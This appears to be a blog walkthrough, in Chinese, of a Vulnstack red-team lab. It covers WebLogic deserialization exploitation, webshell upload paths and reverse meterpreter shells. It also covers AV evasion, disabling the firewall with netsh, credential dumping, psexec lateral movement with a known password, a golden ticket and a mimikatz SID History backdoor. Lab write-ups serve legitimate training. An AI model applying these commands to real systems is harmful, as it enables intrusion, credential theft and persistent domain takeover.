ATT&CK红队评估实战靶场(二)

这篇具有很好参考价值的文章主要介绍了ATT&CK红队评估实战靶场(二)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

第二个靶机来喽,地址:vulunstack

ATT&CK红队评估实战靶场(二),wp,安全

环境配置

大喊一声我淦!!!!!
配个网络配置弄了半天

配置信息

DC
IP:10.10.10.10
OS:Windows 2012(64)
应用:AD域

WEB
IP1:10.10.10.80
IP2:192.168.47.131
OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008

PC
IP1:10.10.10.201
IP2:192.168.47.130
OS:Windows 7(32)

攻击机
IP:192.168.47.128
WEB,PC 有360和防火墙

网络配置:

  • 内网默认网段为10.10.10.1/24
    DMZ默认网段为 192.168.111.1/24
    管理员 Administrator / 1qaz@WSX

ATT&CK红队评估实战靶场(二),wp,安全


内网

首先添加一个vm2的内网自定义,设置子网为10.10.10.1/24

当虚拟机开启时,会采用已经设定过的ip地址(必须符合10.10.10开头)

ATT&CK红队评估实战靶场(二),wp,安全

将DC,PC,WEB 设为 vm2 (内网环境)


外网

内网设置好了,外网这样设置

我设置的外网连接方式为NAT

将 攻击机,PC,WEB 外网设置为NAT,为了与kali在同一网段

PC与WEB做修改如下:

ATT&CK红队评估实战靶场(二),wp,安全
需要管理员权限: Administrator / 1qaz@WSX

ATT&CK红队评估实战靶场(二),wp,安全
选择自动获取ip,自动获取DNS

ATT&CK红队评估实战靶场(二),wp,安全
PC :

ATT&CK红队评估实战靶场(二),wp,安全
WEB :

ATT&CK红队评估实战靶场(二),wp,安全


开启web服务

开启WEB的服务:管理员身份运行

ATT&CK红队评估实战靶场(二),wp,安全

ATT&CK红队评估实战靶场(二),wp,安全
Kali访问如下即配置成功

ATT&CK红队评估实战靶场(二),wp,安全


突破边界

端口

Nmap 端口:

发现445 7001 3389 135等

ATT&CK红队评估实战靶场(二),wp,安全

7001开启 weblogic v10.3.6.0


漏洞扫描

AWVS扫描:

ATT&CK红队评估实战靶场(二),wp,安全
显示存在weblogic漏洞:

ATT&CK红队评估实战靶场(二),wp,安全
WeblogicScan 扫描:

ATT&CK红队评估实战靶场(二),wp,安全
攻击面:

  1. 后台爆破
  2. Java反序列化漏洞
    CVE-2017-3506 漏洞存在
    CVE-2019-2725 漏洞存在
    CVE-2019-2729 漏洞存在

端口攻击

1.后台:爆破就算了

ATT&CK红队评估实战靶场(二),wp,安全
2.MSF

1). CVE-2019-2725

exploit/multi/misc/weblogic_deserialize_asyncresponseservice

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
设置目标为windows:

ATT&CK红队评估实战靶场(二),wp,安全
失败:

ATT&CK红队评估实战靶场(二),wp,安全


2). MS17_010

ATT&CK红队评估实战靶场(二),wp,安全
失败:

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全


漏洞webshell

weblogic漏洞上传木马工具

利用java反序列化利用工具上传木马

ATT&CK红队评估实战靶场(二),wp,安全
Tasklist 查看进程 发现360:

ATT&CK红队评估实战靶场(二),wp,安全
匹配是什么杀软:

ATT&CK红队评估实战靶场(二),wp,安全


木马获取shell

weblogic上传木马路径选择:weblogic上传路径

方法1:把shell写到控制台images目录中:

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp              //目录上传木马

访问 http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

方法2:写到uddiexplorer目录中

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp   //目录写入木马,

访问 http://*.*.*.*:7001/uddiexplorer/shell.jsp

方法3:在应用安装目录中

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp   //目录写入木马,

访问 http://*.*.*.*:7001/项目名/shell.jsp

这里选择第一种

冰蝎

上传冰蝎的jsp马

ATT&CK红队评估实战靶场(二),wp,安全
成功连接:

ATT&CK红队评估实战靶场(二),wp,安全
systeminfo查看一下 主机信息,补丁等

ATT&CK红队评估实战靶场(二),wp,安全
反弹shell :

根据提示操作即可

msf set payload java/meterpreter/reverse_tcp

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全


MSF马

想用msf的马反弹给msf失败:

ATT&CK红队评估实战靶场(二),wp,安全
进行免杀:
bamcompile免杀

生成php后门:

ATT&CK红队评估实战靶场(二),wp,安全
免杀以下转成exe文件:

ATT&CK红队评估实战靶场(二),wp,安全
监听上线 Php/meterpreter: 感觉不好用

ATT&CK红队评估实战靶场(二),wp,安全


cs马

第一次使用cobalt strike:

设置监听:

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
冰蝎上传木马:

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全


Godzilla(哥斯拉)

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
反弹shell: jmeterpreter

ATT&CK红队评估实战靶场(二),wp,安全


weblogic CVE EXP

利用攻击脚本

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
感觉以上的meterpreter都不好使


windows后门免杀处理

去exploit-db下载对应cve-2019-2725 exp

ATT&CK红队评估实战靶场(二),wp,安全
生成一个powershell的木马:

ATT&CK红队评估实战靶场(二),wp,安全
然后进行免杀:Invoke-Obfuscation

ATT&CK红队评估实战靶场(二),wp,安全
注:我免杀之后字符太长了,以至于后面运行时出错,在经过免杀后应该是能bypass360的,所以后面把靶机的360暂时关了,成功获取权限,至于免杀,会再学习的

将exploit的内容替换为木马的内容:

ATT&CK红队评估实战靶场(二),wp,安全
设置监听:

ATT&CK红队评估实战靶场(二),wp,安全
运行exploit:

ATT&CK红队评估实战靶场(二),wp,安全
没反应:

ATT&CK红队评估实战靶场(二),wp,安全
原来是设置payload的问题,改为这样:去掉 x64

ATT&CK红队评估实战靶场(二),wp,安全
获得meterpreter:

ATT&CK红队评估实战靶场(二),wp,安全
顺便关掉防火墙:

netsh advfirewall set allprofiles state off

ATT&CK红队评估实战靶场(二),wp,安全
这里我有个疑问,就是meterpreter的类型不同会对操作有什么影响,比如以上的 phpmeterpreter,javameterpreter,windowsmeterpreter ?


内网渗透

msf派生cs shell

Msf命令注入设置为cs所监听的也就是本机:

ATT&CK红队评估实战靶场(二),wp,安全
Cs设置监听后上线:

ATT&CK红队评估实战靶场(二),wp,安全


信息收集

凭证收集

hashdump
logonpasswords

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全


域内信息

1). 本机信息收集

 Systeminfo  //查看操作系统信息
 Ipconfig /all   //查询本机ip段,所在域等
 Whoami   //查看当前用户权限
 Net user	//查看本地用户
 Net localgroup administrators	//查看本地管理员组(通常 包含域用户)

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
得知web服务器为Windows server 2008 有两个网段

2). 域内信息收集

net config workstation     // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等
net view /domain              // 查看域
net time /domain           // 主域服务器会同时作为时间服务器
net user /domain      // 查看域用户
net group /domain     // 查看域内用户组列表
net group "domain computers" /domain      // 查看域内的机器
net group "domain controllers" /domain          // 查看域控制器组
net group "Enterprise Admins" /domain    // 查看域管理员组

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
域名为de1ay.com 存在两台域主机web和pc 域控为DCde1ay.com主机名为DC,域管理员为Administrator


横向移动

路由代理

ATT&CK红队评估实战靶场(二),wp,安全


内网扫描

arp扫描网段:

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24

ATT&CK红队评估实战靶场(二),wp,安全
扫描存活主机:

use auxiliary/scanner/netbios/nbname

ATT&CK红队评估实战靶场(二),wp,安全
这就奇怪了明明有10.10.10.201但是存活主机没有,后来知道是 PC 防火墙开启的原因


版本扫描

 use auxiliary/scanner/smb/smb_version

dc为 windows2012

ATT&CK红队评估实战靶场(二),wp,安全
Pc为win7:

ATT&CK红队评估实战靶场(二),wp,安全


尝试攻击

永恒之蓝

DC直接蓝屏

ATT&CK红队评估实战靶场(二),wp,安全


psexec

可用cs的,也可用msf的

CS

对目标网段进行端口存活探测,因为是psexec传递登录
仅需探测445端口

得到10.10.10.201和10.10.10.10 :

ATT&CK红队评估实战靶场(二),wp,安全
新建监听:

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
用获取过的密码登录:

ATT&CK红队评估实战靶场(二),wp,安全
上线:

ATT&CK红队评估实战靶场(二),wp,安全
PC 一直上不去:

ATT&CK红队评估实战靶场(二),wp,安全


MSF

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 1qaz@WSX

ATT&CK红队评估实战靶场(二),wp,安全
ATT&CK红队评估实战靶场(二),wp,安全
域控算是拿下


IPC$

这个与第一个靶机最后共享c盘一样

关于PC

Pc一直出现问题,存在工作站与域之间不信任关系,然后我退域进域一直没有解决问题,所以就放弃pc了


域控权限维持

以下方法借鉴参考中的公众号

Golden Ticket(黄金票据)

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,即使日后当域控权限掉了,也可以再通过域内其他任意机器伪造票据重新获取最高权限。

黄金票据的前提:

1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名

ATT&CK红队评估实战靶场(二),wp,安全
在域控获得KRBTGT账户NTLM密码哈希和SID

ATT&CK红队评估实战靶场(二),wp,安全

SID: S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
KRBTGT: 82dfc71b72a11ef37d663047bc2088fb

填上对应参数 :

ATT&CK红队评估实战靶场(二),wp,安全

票据伪造成功

ATT&CK红队评估实战靶场(二),wp,安全
执行命令:

ATT&CK红队评估实战靶场(二),wp,安全


SID History域后门

在Windows中,每个用户都有自己的SID。SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。

如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz,可以将SID History属性添加到域中任意用户的SID History属性中。在实战中,如果获得了域管理员权限,则可以将SID History作为实现持久化的方法。

首先我们在域控制器上新建一个恶意用户“whoami”:

net user whoami Liu78963 /add

然后像之前一样用shellcode_inject启动mimikatz,然后执行如下命令,将域管理员Administrator的SID添加到恶意域用户 whoami 的SID History属性中

privilege::debug
sid::patch
sid::add /sam:whoami /new:Administrator   //将Administrator的SID添加到whoami的SID History属性中

ATT&CK红队评估实战靶场(二),wp,安全

注意:在使用mimikatz注入SID之前,需要使用 sid::patch 命令修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性;mimikatz在2.1版本后,将 misc:addsid 模块添加到了 sid:add 模块下。

然后,我们可以用powershell查看一下这个whoami恶意用户的SID History:

load powershell
powershell_shell
Import-Module activedirectory
Get-ADUser whoami -Properties sidhistory
Get-ADUser administrator -Properties sidhistory

ATT&CK红队评估实战靶场(二),wp,安全
如上图所示,whoami用户的SID History和administrator域管理员的sid相同

那么现在我们的whoami用户便拥有了administrator域管理员的权限,并可以用该用户随时登录域控主机。


参考

红队评估 ATT&CK-02

ATT&CK实战系列(二)琢磨篇

ATT&CK实战系列二(CS域渗透)

实战 | 记一次Vulnstack靶场内网渗透(三)文章来源地址https://www.toymoban.com/news/detail-744701.html

到了这里,关于ATT&CK红队评估实战靶场(二)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • ATT&CK v12版本战术实战研究—持久化(二)

    前几期文章中,我们介绍了ATTCK中侦察、资源开发、初始访问、执行战术、持久化战术的知识。那么从前文中介绍的相关持久化子技术来开展测试,进行更深一步的分析。本文主要内容是介绍攻击者在运用持久化子技术时,在相关的资产服务器或者在PC机器上所产生的特征数据

    2024年02月03日
    浏览(32)
  • 【红蓝攻防鸿篇巨著】ATT&CK视角下的红蓝对抗实战指南

    【文末送书】今天推荐一本网安领域优质书籍《ATTCK视角下的红蓝对抗实战指南》,本文将从其亮点与内容出发,详细阐发其对于网安从业人员的重要性与益处。 根据中国互联网络信息中心(CNNIC)发布的第51次《中国互联网络发展状况统计报告》,截至2022年12月,我国网民规

    2024年02月07日
    浏览(46)
  • ToBeWritten之基于ATT&CK的模拟攻击:闭环的防御与安全运营

    也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球 感谢大家一直以来对我CSDN博客的关注和支持,但

    2024年02月09日
    浏览(44)
  • ATT&CK覆盖度97.1%!360终端安全管理系统获赛可达认证

    近日,国际知名第三方网络安全检测服务机构——赛可达实验室(SKD Labs)发布最新测试报告,360终端安全管理系统以ATTCK V12框架攻击技术覆盖面377个、覆盖度97.1%,勒索病毒、挖矿病毒检出率100%,误报率0%的突出战绩,占据行业同类产品领军地位,顺利通过赛可达实验室资产

    2024年02月12日
    浏览(34)
  • [系统安全] 四十六.恶意软件分析 (2)静态分析Capa经典工具批量提取静态特征和ATT&CK技战术

    终于忙完初稿,开心地写一篇博客。 您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代

    2024年02月11日
    浏览(40)
  • 验证评估守护关基安全 赛宁数字孪生靶场创新实践

    ​​近日,由赛宁网安主办,ISC互联网安全大会组委会协办的第十一届互联网安全大会(ISC 2023)安全运营实践论坛圆满结束。赛宁网安产品总监史崯出席并作出主题演讲:《基于数字孪生靶场如何开展验证评估》,同时重磅发布了赛宁安全验证评估体系。 赛宁网安产品总监

    2024年02月12日
    浏览(43)
  • 红队内网靶场

    开篇介绍 靶场介绍 靶场下载以及配置 Tomcat Get Shell 突破DMZ防火墙 拿下域内成员机器 将内网机器上线到CS 使用Adfind侦察子域信息 控制子域DC Radmin登录子域进行权限维持(白银票据/ACL) 子域bloodhound获取父域信息分析 子域Krbtgt密钥创建跨域金票Dcsync父域 PTH父域DC准备打靶 log4j2拿

    2023年04月17日
    浏览(30)
  • 暗月ACK靶场 WP

    https://mp.weixin.qq.com/s/VB4elHdrHNCmPDP_ktcLRg https://www.bilibili.com/video/BV1264y187St?spm_id_from=333.1007.top_right_bar_window_history.content.click 按照文章拓扑根据实际情况搭建好,web2的其中一个网卡需要自己调一下ip 1、把 12server-web1 中 C:Hws.com/Hws/HostMaster/wwwroot/www.ackmoon.com/web/HdhApp.config 的 ip 地址换

    2024年01月23日
    浏览(35)
  • WP:靶场BBS (cute): 1.0.2

    靶场地址:https://www.vulnhub.com/entry/bbs-cute-102,567/#release 访问扫描出来的文件 使用searchsploit搜索漏洞库中包含的cutenews版本 这里可以看到 这里我们选择\\\"远程代码执行\\\" 发现此脚本不能够直接使用,然后分析了一下脚本内容,发现在脚本URL路径中,需要改动 /CuteNews 位置,将此文

    2024年02月05日
    浏览(26)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包